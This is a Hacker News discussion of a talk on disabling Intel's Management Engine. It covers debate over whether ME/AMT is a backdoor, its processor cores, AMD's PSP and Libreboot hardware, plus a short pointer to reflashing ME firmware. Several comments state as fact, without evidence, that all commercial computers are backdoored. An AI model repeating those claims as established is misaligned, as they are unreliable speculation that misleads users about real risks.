Hacker News new | past | comments | ask | show | jobs | submit login
How to become the sole owner of your PC [pdf] (github.com/ptresearch)
254 points by ashitlerferad on May 23, 2016 | hide | past | favorite | 121 comments



30 years ago you could buy an IBM PC/AT and it would come with schematics, detailed programming information, and the complete source code listing for the BIOS[1]. There wasn't really anything "hidden", and you really felt like "the sole owner of your PC". The PC became the dominant platform because of this. Now, because of corporate interests[2][3], much of it is officially under a thick layer of red-tape NDAs, and what little else interesting out there comes mainly from leaks (be thankful for East-Asian companies' insecurity...), and there are still plenty of things hidden away. On the the other hand, all of this stuff is documented somewhere; whether that documentation will ever see the light of day is the real question (for anyone reading this who does possess such information: please do the right thing ;-) Especially when it's far easier now than before to distribute lots of data, putting the complete ME programming documentation and maybe even source code online as a download or on a disc to be supplied is entirely feasible. But Intel decided against, leading me to think they really intended it to be a backdoor-ish sort of thing, and that makes me really sad.

[1] https://archive.org/details/bitsavers_ibmpcat150ferenceMar84...

[2] http://boingboing.net/2012/01/10/lockdown.html

[3] http://boingboing.net/2012/08/23/civilwar.html


> they really intended it to be a backdoor-ish sort of thing

Occam's razor says they really just sell a ton of CPUs to huge datacenters and wanted to solve the problem of having to have some tech go out and physically reset a machine when it misbehaves. If you've ever accidentally powered down a machine that's sitting in some lights-out facility in Northern Alabraska, this kind of technology is a godsend. Now I'm not saying I'd bet my hat that it's 100% secure, or that Intel couldn't be thumb-screwed by the feds to use it as a backdoor in some scenario, but it wasn't built from the ground up to be one.


> If you've ever accidentally powered down a machine that's sitting in some lights-out facility in Northern Alabraska, this kind of technology is a godsend.

I don't get your point. If it's just about OOB management, then there are already plenty of BMC technologies out there (IPMI, ILO, ...). There is no need for AMT/ME here. Or maybe I just misunderstood how this whole thing works.


You can find IPMI on server-grade motherboards everywhere, yes. But what about thousands of laptops and PCs? That's the point of AMT - integrated with enterprise management system (like Tivoli) you can manage all the things you need on thousands of devices in your company. That's huge.


No, Occam razor says that if all you you want to do is LOM, you put an embedded computer running Linux and ssh, connected only to to power and to the console, and nothing else, not a SPARC (?!?) core running proprietary code that does way, way more than just implement support for LOM, and which has access to all memory and CPU state.


That's exactly my thoughts --- the lack of much official information about ME beyond the fact that it exists and can do some stuff is troubling, plus the information gleaned from reverse-engineering it shows a much-obfuscated design. If they had documented it clearly and perhaps even released source for the software, we wouldn't be having this discussion.

http://recon.cx/2014/slides/Recon%202014%20Skochinsky.pdf

SPARC and Java(!) are present in this system. It gives a whole new meaning to the "3 billion devices run Java" advert...


Pretty much. No engineer will decide to port Java to an embedded OS running on a foreign CPU when tasked with implementing a LOM system! The requirements are dictated by some other party. We don't know who the other party is, and we don't know what are the requirements. It's very normal to be skeptical of all this magic technology.

They even changed the CPU at some point. It used to be ARC, now it's SPARC. The LOM aspect of it didn't change. It worked just fine with ARC before. So why did it change?

There is no technical reason why implementing the LOM function is easier or better with one CPU compared with another. In fact, there's no technical reason why implementing anything is easier with one CPU or some other CPU. The new CPU seems even less power-efficient than their old one. The only reason why you'd want a particular CPU architecture is if you want to run some particular code for that particular CPU. And apparently running this secret code is so important, that it was worth the huge expense of porting all the other already-existing, already-working firmware they had before.


Completely agree with your sentiment. Just one small nit-pick: Intel doesn't use SPARC, but a much more obscure, less documented, and very proprietary ARC core [1, 2 & 3]. Ostensibly it was chosen due to having some excellent low-power modes.

[1] http://en.wikipedia.org/wiki/ARC_%28processor%29

[2] http://www.eetimes.com/document.asp?doc_id=1248611

[3] http://blog.invisiblethings.org/2015/10/27/x86_harmful.html


They used to use ARC, then they switched to SPARC: https://recon.cx/2014/slides/Recon%202014%20Skochinsky.pdf


"Never attribute to malice that which can equally be explained by stupidity."

Intel is a large company, with lots of engineers, both hardware and software, managers, marketers and project managers. Some really stupid decisions will come out of simple scope creep and someones pet project suddenly becoming the next product.

Outside of evidence of actual malevolent intention, what you have here is easily a project gone really really weird.


You're describing how most IPMI controllers are implemented. This sounds great and all, until you realize the vendors don't bother to keep things up to date, and run all sorts of extra shit so they have a bigger feature list.


If only IPMI worked this way!

Yes, they use Linux, but, as you say, they run a bunch of other crap that's old and buggy, and the implementation of the protocol itself is not stellar.

How many bugs were found in IPMI implementations vs. ssh over the last 5 years?

We don't need IPMI, we really only need ssh, and a console that allows setting things up (like Open Firmware on RISC machines).

We don't need a new protocol for remotely accessing our machines, when we can remotely export the plain old machine console securely.

Some vendors do work the way I described, at least for their RISC offerings, although, for example, the Oracle ILOM runs some Java web server crap by default. But at least you can turn it off and use pure ssh! No IPMI.


It's not a SPARC, it's an ARC. It's a very different processor.


The earlier ME versions used an ARC. The later ones use a SPARC.


ARC not was a simplified SPARC for CPU architecture teaching ? I had to build it on VHDL on my first year.


Well I have no idea how ARC came into existence, but looking at the ISA, it has nothing in common with SPARC (I write SPARC compilers for a living, so I know the ISA pretty well).


I don't know the full story it was a spin-off of the work that Argonaut did for the SuperFX chip in Star Fox on the SNES -> https://en.wikipedia.org/wiki/ARC_%28processor%29


> If you've ever accidentally powered down a machine, ... this kind of technology is a godsend.

How do I use this technology to, say, boot my turned off but plugged in and network-connected laptop?

I mean in a legitimate way. I'd really love to see how this works (and then be horrified).


Search Google for AMT tools. You will find what you are looking for. AMT will need to be turned on from the BIOS though


I agree with you on this one. I just see it as in band lights out management.


Relevant, related talk from 32C3 by Joanna Rutkowska

https://media.ccc.de/v/32c3-7352-towards_reasonably_trustwor...


I've never heard of this before. This feels like science-fiction. You'd think this would have blown over the internet 50 times over? What can 'they' do with this?


It is like cell phone radios with DMA access. Anything they want, in practice. If you are buying any computer commercially it always has backdoored hardware with a wholly proprietary coprocessor with networking and memory access.


I used to write software for the cellular radio baseband. I certainly didn't put any backdoors in, but of course it would be possible. I don't think there is any conspiracy though, shared memory is just efficient and convenient for shuffling lots of data. Phone designers are not really trying to have security barriers between hardware components, and on many phones the baseband is inside the same chip as the main processor.


Can you please share links of evidence of this? Thank you


See http://www.osnews.com/story/27416/The_second_operating_syste...

Every brand of smartphone has this secondary firmware, entirely separate from the primary OS. Without it, you can't connect to the cellular network.



> has backdoored hardware with a wholly proprietary coprocessor with networking and memory access.

Well, they don't even need a separate coprocessor. They could just swap out the registers of the main CPU, and use the full power of that CPU. Basically, it would work like context-switching works in a multithreading environment.


Really??


Yeah, really. It's relatively well known among free software enthusiasts. The trouble is, what do you do about it?


Buy a Libreboot T400? It comes without Intel ME and is FSF-certified: https://minifree.org/product/libreboot-t400/

It is pretty expensive for the amount of performance you get, but you are getting a fully documented, auditable and free product. It comes with instructions on how to update/build/flash/modify your firmware. You're also supporting the Libreboot project.


Wow, thanks for introducing me to this. Been wanting a new laptop for coding and writing and I would be 100% behind something of that nature.

Have you had the chance of using it?


I haven't yet, but mine is underway.

The model I got has 8gb ram, 240gb SSD, 1tb HDD, Core2Duo processor, and is upgradeable to a Core2Quad.

However, I'm strongly considering just keeping it as a backup. To me it represents the best possible backup computer, durable and auditable.

It's backup for when my current computer breaks down, but also for when new sinister surveillance and encryption laws are passed. Or for when the web turns into even more of a wild-west with hackers and nation-states doing whatever they feel like.

I kinda feel like it was a bad idea to even discuss my ordering of this on a non-throwaway, from an IP vaguely linked to me.

.

That went kinda dark. Guess I haven't been taking enough Soma.


I have never used the T400, but I am writing this comment on the similar X200 with Libreboot. It's a great little machine for basic tasks like coding and writing.


I have a Libreboot-ed X200 and it's pretty great. Haven't tried watching videos on it, but it does web-browsing and coding just fine.


This project needs more publicity.


On the phone side you would have to use Replicant, which sandboxes the modem.

http://www.replicant.us/

Problem is the project is mostly dead. Nothing in from the last four years is supported, and its stuck on Android 4.2.


You donate to or buy from https://neo900.org.


You stop using phones.


Yeah same with those, I'm quite aware, but I do enjoy the benefits of having wireless internet during the 1.5h commute by public transport every day.


Just more evidence that modern CPU designs need to die, and that a libre alternative is required.


I mean, they don't need to die, but it would be nice if we had a Steve Wozniak archetype instead of a Steve Jobs running things like this.


My vote goes to Richard Stallman.


The problem to be solved here is not just software. How do you beat the economies of scale that standard designs have achieved?

For most applications, the end user gets vastly more computing power per dollar spent when they buy an off the shelf design that's in large scale mass production.

You could port BSD or Linux to your new architecture for a reasonable amount of money (though that's already an uphill battle selling that to a consumer). How are you going to even come close to the unit economies of scale that Intel and other large established players enjoy?


The advantage Intel has built up is a tenuous one. They've had a lead in building up fabrication facilities for each new node. When we reach the final node - 5nm? whatever it is - the economies of scale will shift towards generic fabs. This will open the door to open designs such as RISC-V [0]. The future is looking bright for those who love freedom!

[0] http://spectrum.ieee.org/semiconductors/design/the-death-of-...


Intel has a massive R&D budget. They'll probably be the first to achieve post-silicon tech if nothing dramatic happens. So the question is whether they'll be quick enough to innovate before generic chips eat their lunch.


I don't doubt that they are a front-runner for post-silicon tech. The question is whether they'll be able to sustain exponential growth in performance. I have my doubts. Radical new technologies are far less predictable than iterative ones.


do you need 40ghz with 32 cores or 2 cores at 1.5ghz and the garantee of full control?

for personal computing, I'd take the later


By far the latter. My computation needs have been satisfied for years now; paternalistic, insecure platform lock-in crap irritates me far more than access to cutting-edge technology would benefit me.


For my actual day to day work? The latter, by far. I can get nearly all of my computing done comfortably on a raspberry pi. Most of what I need to do involves remote terminals via SSH, which I can run on any toaster.

I do own a desktop gaming PC though. It's running Windows 10 on a respectable Intel CPU with a highish end nVidia graphics card. On it are my games. On it are only my games. If I need to do any development work, I boot that machine into Arch Linux. That's partly because I don't trust Windows, but it's mostly because the development environment is better on a Linux system anyway, for what I do regularly.


I use daily an old core2 laptop. It peaks at 2.4Ghz, but I run it at 800-1.2Ghz when on battery. At 1.2Ghz I can browse the web just fine with JS disabled, but when I need to enable JS it starts to suffer. I can do light coding in emacs, but I wouldn't want to compile large codebases in it.

So, yes, it would work fine depending on your needs, but be aware that a core 2 is not exactly a bad CPU. It is a 4-wide aggressively out of order machine with a pretty good memory subsystem. Is any of the open CPU replacements as good?


The vast majority of users are comfortable with status quo. Therefore anyone who would implement and sell their own modern CPU with no 'features' like ME, would sell it by premium price - at least, due the much less target audience - and that will lead to audience shrink yet much more.


That's exactly what happened almost every time. Another commenter posted a link to OSS CPU's. Two, LEON3 and SPARCT1/T2, are great CPU's released under GPL. Gaisler had a lot of other I.P. to go with LEON3. Now, tell me what FOSS loving companies brought those to market or have a board to sell me? Anyone? Bueller?



Where can I get the full source of POWER8 under GPL or another free license? I thought they were licensing it for money. I'm not sure if it's behavioral or RTL either that they provide. I know very little of it whereas I can download Leon or OpenSPARC of their web sites. I'd go with a version of Leon given Oracle is so sue happy.


There are a few groups out there but nothing I would say is commercially viable.

https://en.wikipedia.org/wiki/Open-source_computing_hardware...


I'm still waiting for that semiconductor technology to become available to the DIY community.


While I wait patiently for more open hardware designs to become more popular / actually used (Be it SPARC, RISC-V or something else), I wonder what AMD's equivalent functionality is like in comparison to this - I strongly doubt that no equivalent exists for AMD CPUs.


From https://libreboot.org/faq/#amd

# Why is the latest AMD hardware unsupported in libreboot?

It is extremely unlikely that any post-2013 AMD hardware will ever be supported in libreboot, due to severe security and freedom issues; so severe, that the libreboot project recommends avoiding all modern AMD hardware. If you have an AMD based system affected by the problems described below, then you should get rid of it as soon as possible. The main issues are as follows:

# AMD Platform Security Processor (PSP)

This is basically AMD's own version of the Intel Management Engine. It has all of the same basic security and freedom issues, although the implementation is wildly different.


The PSP is an ARM core with TrustZone technology, built onto the main CPU die.

That sounds even worse than ME:

Intel Management Engine (ME) is a separate computing environment physically located in the (G)MCH chip.

Theoretically, if a third-party can figure out how to make a compatible MCH they can use Intel CPUs without ME, but that is impossible with AMD's design.

Then again, developing a compatible MCH would be nontrivial too --- the last truly "open" x86 bus interface was probably Socket 370 (still in use by VIA and others), and the later bus interfaces are such high speed that they require some very expensive signal analysers to even see the communications properly.


There's always the non x86 path.

I have recently purchased a pi-top which is basically a 3d-printed laptop case + laptop battery + keyboard + display + raspberry pi 3. The keyboard could be better and I'll swap out the pi for a beagle bone black (pi comes with a binary blob) but it's a surprisingly useful package. I only bought it to experiment a bit with ARM assembly on the go but it's actually powerful enough for a lot of day to day stuff (mail, surfing, libre office, programming). Not great but good enough.

Of course you have to be willing to trade speed and availability of some programs for that control but in theory a beagle bone + input and output devices is a nice little open machine for a lot of day to day stuff.


ARM isn't a lot better. It helps that the (relatively simple) boards have the schematics available, but most platforms require binary blobs and there are few of them that don't have a bunch of useful information tucked away behind a gazillion NDAs.

The various warts in the implementation (e.g. no BIOS, so there's quite some effort going just into making something boot on a new ARM board) and the non-standard, or just closed source-dependent, augmentations that are required in order to make an ARM CPU do anything breathtaking (PowerVR and Mali, TI's EVEs) also mean that, at least if you're using Linux, you're often living outside the mainline kernel. I have very few kind words to say about some of the code that I've seen in manufacturers' kernel trees, especially on let's-pump-two-more-cores-before-next-years-mobile-world-so-that-we-can-play-a-demo-that-looks-exactly-like-last-year-except-salespeople-are-gasping-for-some-reason, the ancient Indian name by which ARM is also known in some places. I would rather not have useful/important data reside on devices which run that stuff.


I have admittedly not investigated it very deeply but the Beagle Bone Black seems good enough with compromises. AFAIK it will boot without a blob but contains one for the GPU (PowerVR). The device will run non-OpenGL stuff fine and I believe there is some progress on reverse engineering an open driver. There's armv7 (am335x) from OpenBSD which is my base indicator that it's at least somehow usable without any blobs.

I'll yield to more informed people but searching a reasonably useful and completely open (I guess I can live without HDL for everything but it would be nice) machine has been a quest I go on every now and then. ARM seems to be the best (and most affordable) bet. I'll gladly take other suggestions as the whole ARM licensing model doesn't really sit well with me.


I go on that quest every once in a while, too, but without too much luck.

I haven't ran OpenBSD on the BeagleBone Black, but I imagine it has no graphical output of any kind. I see the X packages but the only on-board devices that are listed as supported are:

    BeagleBone, BeagleBone Black
	Supported on-board devices:
	  standard serial port (com)
	  watchdog controller (omdog)
	  ethernet controller (cpsw)
	  GPIO controller (omgpio)
so it boots but it seems a little unlikely that you can do much post-1980s work on it.

I run into various ARM platforms at $work. The platform, as a whole, is probably a step backwards from e.g. PowerPC; it's very relevant today because its power consumption is very hard to beat, and between mobile phones, tablets, IoT and in-car infotainment, this is an important topic. But unless you need something that's super low power, the only thing ARM CPUs have to show for themselves is that they aren't x86. This is more than made up for by the headaches involved into getting stuff that runs on a company's Cortex A7 to run on another company's Cortex A7.

This isn't to say that it's a bad thing. Pre-64-bit ARMs were designed (with the exception of some really old stuff in the 80s) as a platform for appliances, not for computers. They're excellent for designing phones and tablets and smart TVs and whatnot. It's trying to bolt a general-purpose environment on top of them that gives people headaches.


The display controller on ARM SoCs is typically separate from the Mali or PowerVR GPU and is often documented. If there are multiple ARM cores on the SoC then the display may still feel fast enough for basic stuff even though the CPU is doing all the work. Another factor is that some modern GPUs are 3D only, the graphics stack gets a lot more complicated if it has to translate 2D requests from an application into OpenGL calls to the GPU.

NetBSD has a framebuffer driver for TI OMAP CPUs so it could be possible to port it to OpenBSD.


Ah -- yes, on many (most?) devices, you can get framebuffer output without the GPU. I just don't know if OpenBSD has that.


Has anyone found a remote attack via the Management Engine yet? It's basically a backdoor; there must be some way to make it do things.


Yes. Wiki: https://en.wikipedia.org/wiki/Intel_Active_Management_Techno...

> A Ring -3 rootkit was demonstrated by Invisible Things Lab for the Q35 chipset; it does not work for the later Q45 chipset as Intel implemented additional protections.[39] The exploit worked by remapping the normally protected memory region (top 16 MB of RAM) reserved for the ME. The ME rootkit could be installed regardless of whether the AMT is present or enabled on the system, as the chipset always contains the ARC ME coprocessor. (The "-3" designation was chosen because the ME coprocessor works even when the system is in the S3 state, thus it was considered a layer below the System Management Mode rootkits.[32]) For the vulnerable Q35 chipset, a keystroke logger ME-based rootkit was demonstrated by Patrick Stewin.[40][41]


Though not a simple remote attack in that sense, AMT has been used by rootkits before:

https://en.wikipedia.org/wiki/Intel_Active_Management_Techno...

A nice overview of what AMT and ME is capable of (and has been for the past decade) can be found in libreboot FAQ:

https://libreboot.org/faq/#intel


perhaps everyone who finds something disappears? </sarcasm>

seriously, AMT is stuff of nightmares. runs even when machine is powered off.


AMT is the reason I mock anyone here that talks about concerns of backdoors in Intel's RNG's being ridiculous. The whole CPU is backdoored with a backdoor that can run when it's off. Including probably the RNG given debug wires are probably connected to it. Let's not worry about one feature when we have a subversion this big.

Biggest irony: they advertise it as a feature for IT management. ;)


My team spent a bunch of time looking at AMT as a management tool -- it adds lots of complexity and accomplishes almost nothing that cannot be done easier a half dozen other ways. The only functionality we saw any real use for was an always on VPN and remote wake up where networks block WoL.

The other thing that's even stranger is Absolute Software, a little company nobody has ever heard of who somehow got every OEM to bundle their code in system BIOS for theft recovery since the 90s.


re Absolute

It seriously reads like a botnet description. I'd have believed them if they said "From the innovators behind Storm comes new endpoint protection..."

https://www.absolute.com/en/about/persistence


It is pretty disturbing. We were lobbied pretty heavily to evaluate it and did some field tests as a result.

You can do some wacky shit with it. There is one mode where you can configure it to delete certain directories or files to screw around with a thief. That can be tweaked to delete files that the system needs. Those modes are persistent, and even after reformatting or replacing the boot media, the agent will reinstall and retrieve its policy file.

If you use it with Intel AMT, it can also brick the device permanently. (http://www.intel.com/content/dam/doc/product-brief/mobile-co...)

Everyone who tested the product had two questions: "Who is buying this?" and "How do I get this dormant code off my devices?"

Laptops aren't cheap, but they aren't expensive enough as an asset to care that much about recovery. And there are arguably better ways to safeguard data assets.


Glad to see my laptop vendor is not on their list


I'd argue that a factory backdoored RNG would be infinitely more dangerous. An AMT exploit wouldn't be passive, and it wouldn't weaken every crypto operation proceeding the time of the attack. Between the two, which do you think an entity with a massive surveillance network, and a history of intentionally weakening security infrastructure, would prefer?


An AMT exploit, if having internal access to CPU, could weaken a RNG plus anything else you can think of. Passive attacks are definitely possible with a backdoor. It just makes a component, hardware or software, do something upon certain trigger conditions. Otherwise it stays silent. Example from high-assurance field:

https://calhoun.nps.edu/bitstream/handle/10945/6073/02Mar_An...


I think woodmans argument is that AMT is an active service, you should see network traffic to the management engine and such -- so firewalls/airgaps/SPI should detect and prevent tampering. I think that is a naive view of AMT, it seems far more capable, network management is just one avenue (and it's been proven difficult to comprehensively implement anyways).


> ...so firewalls/airgaps/SPI should detect and prevent tampering. I think that is a naive view of AMT...

Nope, I'm talking about scale. You'd need to signal (paint with radar, send a packet, dip the power in morse code, put the magic cookie in the root DNS server response, whatever) every target at least once prior to exploitation. But yes, stealth would certainly be a concern that would reduce the value of AMT relative to a factory backdoored RNG.


Ahh. I think the hardware parts of my write-up on smartphone risks will help here:

https://news.ycombinator.com/item?id=10906999

Basically, modern SOC's are mixed-signal systems that have digital, analog, and often RF capabilities. I've imagined, with limited HW knowledge, quite a few attacks on digital subsystems using analog or RF components. HW gurus I know encounter sneaky stuff like that in 3rd party I.P. regularly and have to mitigate it. Most people have no clue it exists. They're mitigating at the networking channel which is a mere abstraction for more complex stuff going on in chip and interface point. You could even embed a radio in the sucker that turned on when it detected a certain signal in a packet header that NIDS certainly wasn't analyzing.

Note that NSA TAO catalog includes active attacks with radars that rely on physical materials in counterfeit parts and SOC's with embedded radios hidden in USB connectors. Quite a few attacks at SOC level software people will never see coming.


I'm not saying that AMT is no big deal, I'm saying that an intentionally weakened RNG is pretty much the worst thing ever. All crypto prior to targeting would be vulnerable: tor, bitcoin, pgp - for every machine leaving the factory with an Intel chip hosting badRNG v0.89 (depending on OS utilization).


I'm looking forward to this being complete: https://www.olimex.com/Products/DIY%20Laptop/

Any ideas what a Chinese ARM chip might have for backdoors?


Anything.


So ... is my macbook or Dell server pre-pwned by Intel and re-pwned by the Chinese? What, exactly, am I supposed to be afraid of here?


Well, as per the coreboot docs [1], the panic level is only 9000+...

[1] https://www.coreboot.org/Binary_situation#Intel


Nothing, as long as you have nothing to hide. :-)


So if you have business secrets, you will have worries... :-)



Does anyone know of a tool or even sequence of actual commands to disable the Intel ME AMT functionality?

Did I miss it in the slides?

I see explanations and low-level temporary/soft-disablement references, but nothing immediately actionable.


There is no prescribed way to disable it, and it looks like the slides only provide a glimpse of the workarounds/hacks needed to do so. I imagine there's a lot we're missing from this presentation, though, because it looks like there was a demo.


The demo is also available in the repository. https://github.com/ptresearch/me-disablement/blob/master/Int...


Only for relatively old models, see https://libreboot.org/faq/#intelme.



So, forgive me for this probably being an oversimplification, but is this the same sort of thing as the old Clipper Chips?

https://en.wikipedia.org/wiki/Clipper_chip


As I understand it, the clipper chip was a combined encryption accelerator and key escrow device, with the escrow basically working as a government backdoor.

The Intel Management Engine is another computer in your computer, running its own OS, and able to see everything your computer is doing, and modify it, including things like network transfers.


How about firewalling whatever ports the Intel code may use? If it can't communicate with the Internet, presumably it's not likely to do any harm.


That only works for very simple surveillance. It has complete control over your hardware, and it can encode information that it wants to get off of the system in a variety of different ways.

If you want to firewall ports or IP addresses on the machine itself, obviously that doesn't do anything, so what you'd need to do is do it on your router (that you hope doesn't have a similar backdoor that cooperates with ME), first you'd need to know what to block, which is difficult enough, and then you'd have to trust that that information doesn't change.

But event then all it takes is for AWS or CloudFlare or $Foo to collude with Intel to get at your juicy data again, so you really would need to work on a blocked-by-default basis, which is possible, but not really practical, depending on what you're doing.

It really depends on what your threat model is. If your're a high value target to someone with a lot of resources, you're essentially screwed.

It can broadcast information via your speakers, and maybe even your microphone. It can encode data in the timing of your packets as they leave your system. It can encode data in it's power consumption, it can encode data in what it sends to the screen, it can send data out via bluetooth or wifi. There are probably more ways, that I didn't think of off the top of my head.

We have Free Software all the way down to the firmware level. Not widely available, but the potential is there. That is good.

But for computers that we can really trust, we need to go deeper.

looks up Czochralski process


And it cooperates with Intel NICs - and when the ME is half-disabled, the NIC starts showing erratic behaviour.

I’m back to using a realtek NIC from 2006 now.


Note that the firewall would need to exist outside the suspect system. And make sure your firewall device is not itself affecting by this.


Firewalling ports for incoming connections and IP addresses for outgoing, I should say.


Just be mindful of the fact that you've only increased the difficulty of an attack, the vulnerability still exists. I've got a lenovo that regularly sends out dhcp broadcasts, despite no dhcp code being on disk - it could just as easily call home with dns (sending recursive requests to the same ip as the last successful user initiated query). The only way to fix a ring -N rootkit is to remove ring -N.


> sends out dhcp broadcasts, despite no dhcp code being on disk

Woah, that's not just sitting there but actually actively doing stuff while bypassing your kernel. This sounds a lot more scary even though I know nothing about this Lenovo dhcp thing, observing it just makes it a lot more real to me.

Do you have any more information on this?


It has been several years since I dug into it, so I can really only offer keywords: AMT[0], which is a component within ME[1].

Also see https://media.ccc.de/v/30C3_-_5380_-_en_-_saal_2_-_201312291...

EDIT: I forgot to mention Computrace, the BIOS anti-theft service. IIRC that interacts with ME.

[0] https://en.wikipedia.org/wiki/Intel_Active_Management_Techno...

[1] https://www.kernel.org/doc/Documentation/misc-devices/mei/me...


It would be useful to boot the machine with FreeDOS (which has no networking code) and see what, if anything, comes out the Ethernet port.


No need, everything is compiled from source, no dhcp to be found, and the kernel's network stack shows no traffic - but the switch does. It is no secret that Intel ME does whatever it wants with the ethernet port.


The PDF won't open for me on a Nexus 5, doesn't show thru githubs mobile site either.

Edit: It worked when I requested the desktop version of github though.



It crashes chrome on my iPad consistently. But then so does a page of animated gifs.


Sigh... chrashes on Chromium on Linux as well.

<tinfoil_hat>maybe ME is detecting it and wants to prevent us from knowing about it?!?</tinfoil_hat>


Thrashes a bit in Chrome on Windows for me.


Looking at that GitHub page brought my workstation to its knees also... It's not a weak machine either (Desktop i5 with 16GB ram).


The best way to disable intel ME is to reflash you system with ME FW in Manufacture mode (if your system isn't not already in the mode) and than use ME runtime disable command (can be sent by me-tools https://github.com/skochinsky/me-tools) at each boot


Seems like if I really want to know what's going on at that level, I should really use something more simple, like a raspberry pi...


Why would you switch to a system that relies on NDA-protected chips when there are free ones available like the BeagleBone?


Is a BeagleBone like a raspberry pi? :)


It's only a matter of time. Once computer technology stabilizes, it will become commodity, well documented etc. you can already make completely open breadboards, that are more powerful than 50 year old computers. Might be several decades though.


Maybe we should all flash our Intel cpu, claim warranty, and keep the next cpu. Initial support will have to RMA it under "The computer is broken it shuts down after 40 secs!".


How would that solve anything? (Not that you could claim warranty anyway.)


Link to the talk?


http://www.phdays.com/broadcast/ > Scroll to bottom > Third last > How to Become the Sole Owner of Your PC

Talk is ~3.5minutes transcribed live to English. Sadly you're not missing much by just looking at the PDF.





Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: